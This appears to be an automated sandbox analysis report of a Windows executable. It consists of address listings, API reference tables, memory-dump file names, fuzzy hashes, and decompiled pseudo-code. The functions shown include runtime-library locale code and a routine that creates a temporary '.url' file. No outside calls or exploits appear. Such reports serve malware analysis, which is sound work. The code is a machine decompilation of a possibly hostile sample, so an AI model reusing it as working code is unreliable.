                                                                                                0x00f7b627
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7b62d
                                                                                                0x00f7b62d
                                                                                                0x00f7b632
                                                                                                0x00f7b645
                                                                                                0x00f7b647
                                                                                                0x00f7b64a
                                                                                                0x00f7b650
                                                                                                0x00f7b6af
                                                                                                0x00f7b652
                                                                                                0x00f7b655
                                                                                                0x00f7b655
                                                                                                0x00f7b65a
                                                                                                0x00f7b668
                                                                                                0x00f7b65c
                                                                                                0x00f7b65c
                                                                                                0x00f7b661
                                                                                                0x00f7b663
                                                                                                0x00f7b663
                                                                                                0x00f7b663
                                                                                                0x00f7b661
                                                                                                0x00f7b671
                                                                                                0x00f7b676
                                                                                                0x00f7b67a
                                                                                                0x00f7b67f
                                                                                                0x00f7b682
                                                                                                0x00f7b688
                                                                                                0x00f7b68f
                                                                                                0x00f7b695
                                                                                                0x00f7b69c
                                                                                                0x00f7b6a3
                                                                                                0x00f7b6a9
                                                                                                0x00f7b6a9
                                                                                                0x00f7b6b1
                                                                                                0x00f7b6bb
                                                                                                0x00f7b6c3
                                                                                                0x00f7b6c6
                                                                                                0x00f7b6c6
                                                                                                0x00f7b6cb
                                                                                                0x00f7b6ce
                                                                                                0x00f7b6d3
                                                                                                0x00f7b6df
                                                                                                0x00f7b6e2
                                                                                                0x00f7b6e8
                                                                                                0x00f7b6ef
                                                                                                0x00f7b634
                                                                                                0x00f7b634
                                                                                                0x00f7b634
                                                                                                0x00000000
                                                                                                0x00f7b632
                                                                                                0x00f7b615
                                                                                                0x00f7b61d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7b622
                                                                                                0x00000000
                                                                                                0x00f7b622
                                                                                                0x00f7b605

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F7B5A1
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F7B5BF
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F7B5E7
                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,00000000,FD8FA683,00000000,00000000,00000000), ref: 00F7B63F
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F7B6D3
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F7B6FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                • String ID:
                                                                                                • API String ID: 3931714976-0
                                                                                                • Opcode ID: 999a56070cf8730ea8ece9b1fc053635a5d320d8422a76d5b679135d58165cc1
                                                                                                • Instruction ID: ed4875325b1fa0775cedba2a4e69a0eee8021f78434b8b350adbd1c87bd6f57a
                                                                                                • Opcode Fuzzy Hash: 999a56070cf8730ea8ece9b1fc053635a5d320d8422a76d5b679135d58165cc1
                                                                                                • Instruction Fuzzy Hash: 3651C171905218DFDB11CF58C944B9EBBB4EF01720F14819EE909AB391D774AE01EB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E00F7F7F0(void* _a4) {
                                                                                                				char _v8;
                                                                                                				char _v16;
                                                                                                				signed int _v20;
                                                                                                				char _v24;
                                                                                                				intOrPtr* _v28;
                                                                                                				char _v32;
                                                                                                				char _v84;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t49;
                                                                                                				intOrPtr* _t53;
                                                                                                				intOrPtr _t56;
                                                                                                				void* _t65;
                                                                                                				signed int _t70;
                                                                                                				signed int _t71;
                                                                                                				signed int _t73;
                                                                                                				intOrPtr _t78;
                                                                                                				intOrPtr _t84;
                                                                                                				signed int _t89;
                                                                                                				intOrPtr* _t92;
                                                                                                				intOrPtr* _t94;
                                                                                                				signed int _t95;
                                                                                                
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb6950);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t49 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t49 ^ _t95);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_t73 = 0;
                                                                                                				_v20 = 0;
                                                                                                				E00F856E6( &_v32, 0);
                                                                                                				_v8 = 0;
                                                                                                				_t89 =  *0xfd27b8;
                                                                                                				_t53 =  *0xfd1528; // 0x0
                                                                                                				_v28 = _t53;
                                                                                                				if(_t89 == 0) {
                                                                                                					E00F856E6( &_v24, _t89);
                                                                                                					_v8 = 1;
                                                                                                					if( *0xfd27b8 == _t89) {
                                                                                                						_t70 =  *0xfd0954; // 0x0
                                                                                                						_t71 = _t70 + 1;
                                                                                                						 *0xfd0954 = _t71;
                                                                                                						 *0xfd27b8 = _t71;
                                                                                                					}
                                                                                                					_v8 = 0;
                                                                                                					E00F8573E( &_v24);
                                                                                                					_t89 =  *0xfd27b8;
                                                                                                				}
                                                                                                				_t78 =  *((intOrPtr*)(_a4 + 4));
                                                                                                				if(_t89 >=  *((intOrPtr*)(_t78 + 0xc))) {
                                                                                                					_t92 = 0;
                                                                                                					goto L8;
                                                                                                				} else {
                                                                                                					_t92 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 8)) + _t89 * 4));
                                                                                                					if(_t92 != 0) {
                                                                                                						L24:
                                                                                                						_v8 = 0xffffffff;
                                                                                                						E00F8573E( &_v32);
                                                                                                						 *[fs:0x0] = _v16;
                                                                                                						return _t92;
                                                                                                					} else {
                                                                                                						L8:
                                                                                                						if( *((char*)(_t78 + 0x14)) == 0) {
                                                                                                							L11:
                                                                                                							if(_t92 != 0) {
                                                                                                								goto L24;
                                                                                                							}
                                                                                                							L12:
                                                                                                							_t56 = _v28;
                                                                                                							if(_t56 == 0) {
                                                                                                								_t94 = LocalAlloc(0x40, 8);
                                                                                                								_v28 = _t94;
                                                                                                								_v8 = 2;
                                                                                                								if(_t94 == 0) {
                                                                                                									_t92 = 0;
                                                                                                								} else {
                                                                                                									_t84 =  *((intOrPtr*)(_a4 + 4));
                                                                                                									if(_t84 == 0) {
                                                                                                										_t63 = 0xfc76d9;
                                                                                                									} else {
                                                                                                										_t63 =  *((intOrPtr*)(_t84 + 0x18));
                                                                                                										if( *((intOrPtr*)(_t84 + 0x18)) == 0) {
                                                                                                											_t63 = _t84 + 0x1c;
                                                                                                										}
                                                                                                									}
                                                                                                									E00F78E20( &_v84, _t94, _t63);
                                                                                                									_v8 = 3;
                                                                                                									_t73 = 1;
                                                                                                									_v20 = 1;
                                                                                                									 *_t94 = 0xfb83d0;
                                                                                                									_v8 = 4;
                                                                                                									 *_t94 = 0xfb83e0;
                                                                                                									 *((intOrPtr*)(_t94 + 4)) = 0;
                                                                                                									_v8 = 5;
                                                                                                									 *_t94 = 0xfb9480;
                                                                                                									_v8 = 3;
                                                                                                								}
                                                                                                								_v8 = 0;
                                                                                                								if((_t73 & 0x00000001) != 0) {
                                                                                                									_v20 = _t73 & 0xfffffffe;
                                                                                                									E00F79300();
                                                                                                								}
                                                                                                								_a4 = _t92;
                                                                                                								_v8 = 7;
                                                                                                								E00F85472(_t92);
                                                                                                								 *((intOrPtr*)( *_t92 + 4))();
                                                                                                								 *0xfd1528 = _t92;
                                                                                                								_a4 = 0;
                                                                                                								_v8 = 0;
                                                                                                							} else {
                                                                                                								_t92 = _t56;
                                                                                                							}
                                                                                                							goto L24;
                                                                                                						}
                                                                                                						_t65 = E00F8549E();
                                                                                                						if(_t89 >=  *((intOrPtr*)(_t65 + 0xc))) {
                                                                                                							goto L12;
                                                                                                						}
                                                                                                						_t92 =  *((intOrPtr*)( *((intOrPtr*)(_t65 + 8)) + _t89 * 4));
                                                                                                						goto L11;
                                                                                                					}
                                                                                                				}
                                                                                                			}

























                                                                                                0x00f7f7f3
                                                                                                0x00f7f7f5
                                                                                                0x00f7f800
                                                                                                0x00f7f807
                                                                                                0x00f7f80e
                                                                                                0x00f7f812
                                                                                                0x00f7f818
                                                                                                0x00f7f81e
                                                                                                0x00f7f821
                                                                                                0x00f7f826
                                                                                                0x00f7f829
                                                                                                0x00f7f82f
                                                                                                0x00f7f834
                                                                                                0x00f7f839
                                                                                                0x00f7f83f
                                                                                                0x00f7f844
                                                                                                0x00f7f84e
                                                                                                0x00f7f850
                                                                                                0x00f7f855
                                                                                                0x00f7f856
                                                                                                0x00f7f85b
                                                                                                0x00f7f85b
                                                                                                0x00f7f860
                                                                                                0x00f7f867
                                                                                                0x00f7f86c
                                                                                                0x00f7f86c
                                                                                                0x00f7f875
                                                                                                0x00f7f87b
                                                                                                0x00f7f88d
                                                                                                0x00000000
                                                                                                0x00f7f87d
                                                                                                0x00f7f880
                                                                                                0x00f7f885
                                                                                                0x00f7f973
                                                                                                0x00f7f973
                                                                                                0x00f7f97d
                                                                                                0x00f7f987
                                                                                                0x00f7f995
                                                                                                0x00f7f88b
                                                                                                0x00f7f88f
                                                                                                0x00f7f893
                                                                                                0x00f7f8a5
                                                                                                0x00f7f8a7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7f8ad
                                                                                                0x00f7f8ad
                                                                                                0x00f7f8b2
                                                                                                0x00f7f8c5
                                                                                                0x00f7f8c7
                                                                                                0x00f7f8ca
                                                                                                0x00f7f8d0
                                                                                                0x00f7f92f
                                                                                                0x00f7f8d2
                                                                                                0x00f7f8d5
                                                                                                0x00f7f8da
                                                                                                0x00f7f8e8
                                                                                                0x00f7f8dc
                                                                                                0x00f7f8dc
                                                                                                0x00f7f8e1
                                                                                                0x00f7f8e3
                                                                                                0x00f7f8e3
                                                                                                0x00f7f8e1
                                                                                                0x00f7f8f1
                                                                                                0x00f7f8f6
                                                                                                0x00f7f8fa
                                                                                                0x00f7f8ff
                                                                                                0x00f7f902
                                                                                                0x00f7f908
                                                                                                0x00f7f90f
                                                                                                0x00f7f915
                                                                                                0x00f7f91c
                                                                                                0x00f7f923
                                                                                                0x00f7f929
                                                                                                0x00f7f929
                                                                                                0x00f7f931
                                                                                                0x00f7f93b
                                                                                                0x00f7f943
                                                                                                0x00f7f946
                                                                                                0x00f7f946
                                                                                                0x00f7f94b
                                                                                                0x00f7f94e
                                                                                                0x00f7f953
                                                                                                0x00f7f95f
                                                                                                0x00f7f962
                                                                                                0x00f7f968
                                                                                                0x00f7f96f
                                                                                                0x00f7f8b4
                                                                                                0x00f7f8b4
                                                                                                0x00f7f8b4
                                                                                                0x00000000
                                                                                                0x00f7f8b2
                                                                                                0x00f7f895
                                                                                                0x00f7f89d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7f8a2
                                                                                                0x00000000
                                                                                                0x00f7f8a2
                                                                                                0x00f7f885

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F7F821
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F7F83F
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F7F867
                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,00000000,FD8FA683,00000003,00000000), ref: 00F7F8BF
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F7F953
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F7F97D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                • String ID:
                                                                                                • API String ID: 3931714976-0
                                                                                                • Opcode ID: 5d66c80274cfd420015d738180c481b40953baedc075c515ffc646d984809f64
                                                                                                • Instruction ID: 8f3974fd08c558668a404ae9d4dc1ee46f3ab9e7697caa09386284337e120887
                                                                                                • Opcode Fuzzy Hash: 5d66c80274cfd420015d738180c481b40953baedc075c515ffc646d984809f64
                                                                                                • Instruction Fuzzy Hash: 5951B071D05218DFDB11CF68C880B9EBBF4EF14760F24816ED449AB381D7749A49EB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E00F97782(void* __ecx) {
                                                                                                				void* _t4;
                                                                                                				void* _t8;
                                                                                                				void* _t11;
                                                                                                				void* _t13;
                                                                                                				void* _t14;
                                                                                                				void* _t18;
                                                                                                				void* _t23;
                                                                                                				long _t24;
                                                                                                				void* _t27;
                                                                                                
                                                                                                				_t13 = __ecx;
                                                                                                				if( *0xfcf030 != 0xffffffff) {
                                                                                                					_t24 = GetLastError();
                                                                                                					_t11 = E00F98992(_t13, __eflags,  *0xfcf030);
                                                                                                					_t14 = _t23;
                                                                                                					__eflags = _t11 - 0xffffffff;
                                                                                                					if(_t11 == 0xffffffff) {
                                                                                                						L5:
                                                                                                						_t11 = 0;
                                                                                                					} else {
                                                                                                						__eflags = _t11;
                                                                                                						if(__eflags == 0) {
                                                                                                							_t4 = E00F989CD(_t14, __eflags,  *0xfcf030, 0xffffffff);
                                                                                                							__eflags = _t4;
                                                                                                							if(_t4 != 0) {
                                                                                                								_push(0x28);
                                                                                                								_t27 = E00FA224E();
                                                                                                								_t18 = 1;
                                                                                                								__eflags = _t27;
                                                                                                								if(__eflags == 0) {
                                                                                                									L8:
                                                                                                									_t11 = 0;
                                                                                                									E00F989CD(_t18, __eflags,  *0xfcf030, 0);
                                                                                                								} else {
                                                                                                									_t8 = E00F989CD(_t18, __eflags,  *0xfcf030, _t27);
                                                                                                									_pop(_t18);
                                                                                                									__eflags = _t8;
                                                                                                									if(__eflags != 0) {
                                                                                                										_t11 = _t27;
                                                                                                										_t27 = 0;
                                                                                                										__eflags = 0;
                                                                                                									} else {
                                                                                                										goto L8;
                                                                                                									}
                                                                                                								}
                                                                                                								E00F9BD1B(_t27);
                                                                                                							} else {
                                                                                                								goto L5;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					SetLastError(_t24);
                                                                                                					return _t11;
                                                                                                				} else {
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}












                                                                                                0x00f97782
                                                                                                0x00f97789
                                                                                                0x00f9779c
                                                                                                0x00f977a3
                                                                                                0x00f977a5
                                                                                                0x00f977a6
                                                                                                0x00f977a9
                                                                                                0x00f977c2
                                                                                                0x00f977c2
                                                                                                0x00f977ab
                                                                                                0x00f977ab
                                                                                                0x00f977ad
                                                                                                0x00f977b7
                                                                                                0x00f977be
                                                                                                0x00f977c0
                                                                                                0x00f977c7
                                                                                                0x00f977d0
                                                                                                0x00f977d3
                                                                                                0x00f977d4
                                                                                                0x00f977d6
                                                                                                0x00f977ea
                                                                                                0x00f977ea
                                                                                                0x00f977f3
                                                                                                0x00f977d8
                                                                                                0x00f977df
                                                                                                0x00f977e5
                                                                                                0x00f977e6
                                                                                                0x00f977e8
                                                                                                0x00f977fc
                                                                                                0x00f977fe
                                                                                                0x00f977fe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f977e8
                                                                                                0x00f97801
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f977c0
                                                                                                0x00f977ad
                                                                                                0x00f97809
                                                                                                0x00f97813
                                                                                                0x00f9778b
                                                                                                0x00f9778d
                                                                                                0x00f9778d

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,00F97779,00F959EA,00F81800), ref: 00F97790
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F9779E
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F977B7
                                                                                                • SetLastError.KERNEL32(00000000,00F97779,00F959EA,00F81800), ref: 00F97809
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: 6784a427fc247348f8f6eff79c33f9b3085ec70692e70c705d1e90b33160061d
                                                                                                • Instruction ID: 386d4265a11ffc2d1e201f8485a70cfa6c9d3189e32263c540285cbbeda0ebd4
                                                                                                • Opcode Fuzzy Hash: 6784a427fc247348f8f6eff79c33f9b3085ec70692e70c705d1e90b33160061d
                                                                                                • Instruction Fuzzy Hash: 6401243262E7115EBF2536B4BD86E667A64EB42FF47300239F120460E2EF124C0BB581
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E00F72FF0(void* __ebx, signed int __ecx, WCHAR** __edx) {
                                                                                                				char _v0;
                                                                                                				int _v8;
                                                                                                				char _v16;
                                                                                                				signed int _v20;
                                                                                                				short _v540;
                                                                                                				int _v544;
                                                                                                				int _v548;
                                                                                                				char _v564;
                                                                                                				int _v568;
                                                                                                				int _v572;
                                                                                                				signed int _v588;
                                                                                                				int _v592;
                                                                                                				int _v596;
                                                                                                				char _v612;
                                                                                                				signed int _v616;
                                                                                                				int _v620;
                                                                                                				WCHAR** _v624;
                                                                                                				signed int _v628;
                                                                                                				char _v644;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t136;
                                                                                                				signed int _t137;
                                                                                                				WCHAR* _t139;
                                                                                                				int _t140;
                                                                                                				signed int _t141;
                                                                                                				signed int _t152;
                                                                                                				WCHAR* _t157;
                                                                                                				void* _t177;
                                                                                                				void* _t179;
                                                                                                				signed int _t182;
                                                                                                				void* _t183;
                                                                                                				signed int _t184;
                                                                                                				void* _t185;
                                                                                                				signed int _t188;
                                                                                                				void* _t197;
                                                                                                				int _t201;
                                                                                                				void* _t206;
                                                                                                				void* _t208;
                                                                                                				void* _t210;
                                                                                                				signed int _t212;
                                                                                                				intOrPtr* _t215;
                                                                                                				signed int _t222;
                                                                                                				signed int _t223;
                                                                                                				signed int _t224;
                                                                                                				intOrPtr _t240;
                                                                                                				signed int _t241;
                                                                                                				signed int _t242;
                                                                                                				void* _t244;
                                                                                                				void* _t245;
                                                                                                				void* _t251;
                                                                                                				signed int _t252;
                                                                                                				signed int _t255;
                                                                                                				signed int _t256;
                                                                                                				signed int _t257;
                                                                                                				signed int _t258;
                                                                                                				signed int _t259;
                                                                                                				signed int _t260;
                                                                                                				int* _t264;
                                                                                                				signed int _t266;
                                                                                                				void* _t268;
                                                                                                				char _t269;
                                                                                                				signed int _t270;
                                                                                                				signed int _t275;
                                                                                                				signed int _t276;
                                                                                                				signed int _t279;
                                                                                                				signed int _t281;
                                                                                                				intOrPtr _t282;
                                                                                                				signed int _t284;
                                                                                                				void* _t285;
                                                                                                
                                                                                                				_t250 = __edx;
                                                                                                				_t206 = __ebx;
                                                                                                				_t279 = _t284;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb578d);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t285 = _t284 - 0x264;
                                                                                                				_t136 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t137 = _t136 ^ _t279;
                                                                                                				_v20 = _t137;
                                                                                                				_push(_t268);
                                                                                                				_push(_t137);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_v624 = __edx;
                                                                                                				_t264 = __ecx;
                                                                                                				_v616 = __ecx;
                                                                                                				_v628 = __ecx;
                                                                                                				_t139 = __edx;
                                                                                                				_v620 = 0;
                                                                                                				if(__edx[5] >= 8) {
                                                                                                					_t139 =  *__edx;
                                                                                                				}
                                                                                                				_t140 = GetTempFileNameW(_t139, "URL", 0,  &_v540);
                                                                                                				if(_t140 != 0) {
                                                                                                					_t215 =  &_v540;
                                                                                                					_t251 = _t215 + 2;
                                                                                                					do {
                                                                                                						_t141 =  *_t215;
                                                                                                						_t215 = _t215 + 2;
                                                                                                						__eflags = _t141;
                                                                                                					} while (_t141 != 0);
                                                                                                					_v596 = 0;
                                                                                                					_v612 = 0;
                                                                                                					_v592 = 0;
                                                                                                					_v596 = 0;
                                                                                                					_v592 = 7;
                                                                                                					E00F71D10(_t206,  &_v612, _t264, _t268,  &_v540, _t215 - _t251 >> 1);
                                                                                                					_v8 = 3;
                                                                                                					E00F77A70(_t206,  &_v564,  &_v612);
                                                                                                					_v8 = 5;
                                                                                                					E00F72D10( &_v612);
                                                                                                					_v572 = 0;
                                                                                                					_v568 = 0;
                                                                                                					_v572 = 0;
                                                                                                					_v568 = 7;
                                                                                                					_v588 = 0;
                                                                                                					E00F71D10(_t206,  &_v588, _t264, _t268, "url", 3);
                                                                                                					_v8 = 6;
                                                                                                					_t222 = _v568;
                                                                                                					__eflags = _t222 - 8;
                                                                                                					_t252 = _v588;
                                                                                                					_t151 =  >=  ? _t252 :  &_v588;
                                                                                                					__eflags =  *((short*)( >=  ? _t252 :  &_v588)) - 0x2e;
                                                                                                					if( *((short*)( >=  ? _t252 :  &_v588)) != 0x2e) {
                                                                                                						L9:
                                                                                                						_t152 = _v548;
                                                                                                						_t223 = _t152;
                                                                                                						_t250 = _v544;
                                                                                                						_t269 = _v564;
                                                                                                						_v616 = _t152;
                                                                                                						__eflags = _t223;
                                                                                                						if(_t223 == 0) {
                                                                                                							L18:
                                                                                                							__eflags = _t223 - 0xffffffff;
                                                                                                							if(_t223 == 0xffffffff) {
                                                                                                								goto L15;
                                                                                                							} else {
                                                                                                								E00F71360( &_v564, _t223, 0);
                                                                                                								_t250 = _v544;
                                                                                                								_t224 = _v548;
                                                                                                								_t269 = _v564;
                                                                                                								goto L16;
                                                                                                							}
                                                                                                							goto L64;
                                                                                                						} else {
                                                                                                							_t223 = _t223 - 1;
                                                                                                							__eflags = _t223 - 0xffffffff;
                                                                                                							if(_t223 == 0xffffffff) {
                                                                                                								_t224 = _t152;
                                                                                                							} else {
                                                                                                								asm("o16 nop [eax+eax]");
                                                                                                								while(1) {
                                                                                                									__eflags = _t250 - 8;
                                                                                                									_t177 =  >=  ? _t269 :  &_v564;
                                                                                                									__eflags =  *((short*)(_t177 + _t223 * 2)) - 0x5c;
                                                                                                									if( *((short*)(_t177 + _t223 * 2)) == 0x5c) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t250 - 8;
                                                                                                									_t179 =  >=  ? _t269 :  &_v564;
                                                                                                									__eflags =  *((short*)(_t179 + _t223 * 2)) - 0x2e;
                                                                                                									if( *((short*)(_t179 + _t223 * 2)) == 0x2e) {
                                                                                                										goto L18;
                                                                                                									} else {
                                                                                                										_t223 = _t223 - 1;
                                                                                                										__eflags = _t223 - 0xffffffff;
                                                                                                										if(_t223 != 0xffffffff) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											break;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L16;
                                                                                                								}
                                                                                                								L15:
                                                                                                								_t224 = _v616;
                                                                                                							}
                                                                                                						}
                                                                                                						L16:
                                                                                                						__eflags = _t224 - _t250;
                                                                                                						if(_t224 >= _t250) {
                                                                                                							_push(0x2e);
                                                                                                							_v616 = 0;
                                                                                                							_push(_v616);
                                                                                                							_push(_t224);
                                                                                                							E00F717F0(_t206,  &_v564, _t250, _t269);
                                                                                                						} else {
                                                                                                							__eflags = _t250 - 8;
                                                                                                							_v548 = _t224 + 1;
                                                                                                							_t174 =  >=  ? _t269 :  &_v564;
                                                                                                							 *((intOrPtr*)(( >=  ? _t269 :  &_v564) + _t224 * 2)) = 0x2e;
                                                                                                						}
                                                                                                						E00F71770( &_v564, _t279,  &_v588);
                                                                                                						_t157 = E00F77B40(_t206,  &_v564, _t250, _t264, _t269,  &_v612);
                                                                                                						_v8 = 7;
                                                                                                						__eflags = _t157[0xa] - 8;
                                                                                                						if(_t157[0xa] >= 8) {
                                                                                                							_t157 =  *_t157;
                                                                                                						}
                                                                                                						_t270 = MoveFileW( &_v540, _t157);
                                                                                                						_v8 = 6;
                                                                                                						E00F72D10( &_v612);
                                                                                                						__eflags = _t270;
                                                                                                						if(_t270 != 0) {
                                                                                                							asm("movups xmm0, [ebp-0x230]");
                                                                                                							_t264[4] = 0;
                                                                                                							__eflags = 0;
                                                                                                							_t264[5] = 0;
                                                                                                							asm("movups [edi], xmm0");
                                                                                                							_v564 = 0;
                                                                                                							asm("movq xmm0, [ebp-0x220]");
                                                                                                							asm("movq [edi+0x10], xmm0");
                                                                                                							_v548 = 0;
                                                                                                							_v544 = 7;
                                                                                                							_v8 = 6;
                                                                                                							_v620 = 1;
                                                                                                							_v8 = 5;
                                                                                                							E00F72D10( &_v588);
                                                                                                						} else {
                                                                                                							_t250 = _v624;
                                                                                                							_push("url");
                                                                                                							_push("URL");
                                                                                                							E00F72FF0(_t206,  &_v612, _v624);
                                                                                                							_v8 = 8;
                                                                                                							DeleteFileW( &_v540);
                                                                                                							asm("movups xmm0, [ebp-0x260]");
                                                                                                							_t264[4] = _t270;
                                                                                                							_t264[5] = _t270;
                                                                                                							asm("movups [edi], xmm0");
                                                                                                							_v612 = 0;
                                                                                                							asm("movq xmm0, [ebp-0x250]");
                                                                                                							asm("movq [edi+0x10], xmm0");
                                                                                                							_v596 = _t270;
                                                                                                							_v592 = 7;
                                                                                                							_v8 = 8;
                                                                                                							_v620 = 1;
                                                                                                							_v8 = 6;
                                                                                                							E00F72D10( &_v612);
                                                                                                							_v8 = 5;
                                                                                                							E00F72D10( &_v588);
                                                                                                						}
                                                                                                						_v8 = 0;
                                                                                                						E00F72D10( &_v564);
                                                                                                						goto L28;
                                                                                                					} else {
                                                                                                						__eflags = _t222 - 8;
                                                                                                						_t181 =  >=  ? _t252 :  &_v588;
                                                                                                						_t273 =  >=  ? _t252 :  &_v588;
                                                                                                						_t274 = ( >=  ? _t252 :  &_v588) - ( >=  ? _t252 :  &_v588);
                                                                                                						_t182 = _v572;
                                                                                                						_t275 = ( >=  ? _t252 :  &_v588) - ( >=  ? _t252 :  &_v588) >> 1;
                                                                                                						_v616 = _t182;
                                                                                                						__eflags = _t182 - _t275;
                                                                                                						if(_t182 < _t275) {
                                                                                                							_t183 = E00F717E0(_t206, _t222, _t252, _t275);
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							asm("int3");
                                                                                                							_push(_t222);
                                                                                                							_push(_t275);
                                                                                                							_t276 = _t222;
                                                                                                							_push(_t264);
                                                                                                							_t266 =  *(_t276 + 0x10);
                                                                                                							__eflags = _t266;
                                                                                                							if(_t266 != 0) {
                                                                                                								_t240 =  *((intOrPtr*)(_t276 + 0x14));
                                                                                                								_push(_t279);
                                                                                                								_t281 = _t276;
                                                                                                								__eflags = _t240 - 8;
                                                                                                								if(__eflags >= 0) {
                                                                                                									_t281 =  *_t276;
                                                                                                								}
                                                                                                								_t184 = _t276;
                                                                                                								if(__eflags >= 0) {
                                                                                                									_t184 =  *_t276;
                                                                                                								}
                                                                                                								__eflags =  *((short*)(_t184 + _t266 * 2 - 2)) - 0x5c;
                                                                                                								_t185 = _t184 + _t266 * 2;
                                                                                                								_push(_t206);
                                                                                                								if( *((short*)(_t184 + _t266 * 2 - 2)) != 0x5c) {
                                                                                                									L44:
                                                                                                									_t241 = _t276;
                                                                                                									__eflags = _t266 - 2;
                                                                                                									_t208 =  <  ? _t266 : 2;
                                                                                                									__eflags =  *((intOrPtr*)(_t276 + 0x14)) - 8;
                                                                                                									if( *((intOrPtr*)(_t276 + 0x14)) >= 8) {
                                                                                                										_t241 =  *_t276;
                                                                                                									}
                                                                                                									__eflags = _t208 - 2;
                                                                                                									_t187 =  >  ? 2 : _t208;
                                                                                                									_t188 = E00F71C40(_t241, 0xfc6f3c,  >  ? 2 : _t208);
                                                                                                									__eflags = _t188;
                                                                                                									if(_t188 == 0) {
                                                                                                										__eflags = _t208 - 2;
                                                                                                										if(_t208 >= 2) {
                                                                                                											__eflags = 2 - _t208;
                                                                                                											asm("sbb eax, eax");
                                                                                                											_t188 =  ~2;
                                                                                                										} else {
                                                                                                											_t188 = _t188 | 0xffffffff;
                                                                                                										}
                                                                                                									}
                                                                                                									__eflags = _t188;
                                                                                                									_t255 = _t276;
                                                                                                									_t210 =  !=  ? _t281 :  &_v0;
                                                                                                									_t282 =  *((intOrPtr*)(_t276 + 0x14));
                                                                                                									__eflags = _t282 - 8;
                                                                                                									if(_t282 >= 8) {
                                                                                                										_t255 =  *_t276;
                                                                                                									}
                                                                                                									__eflags = _t266;
                                                                                                									if(_t266 == 0) {
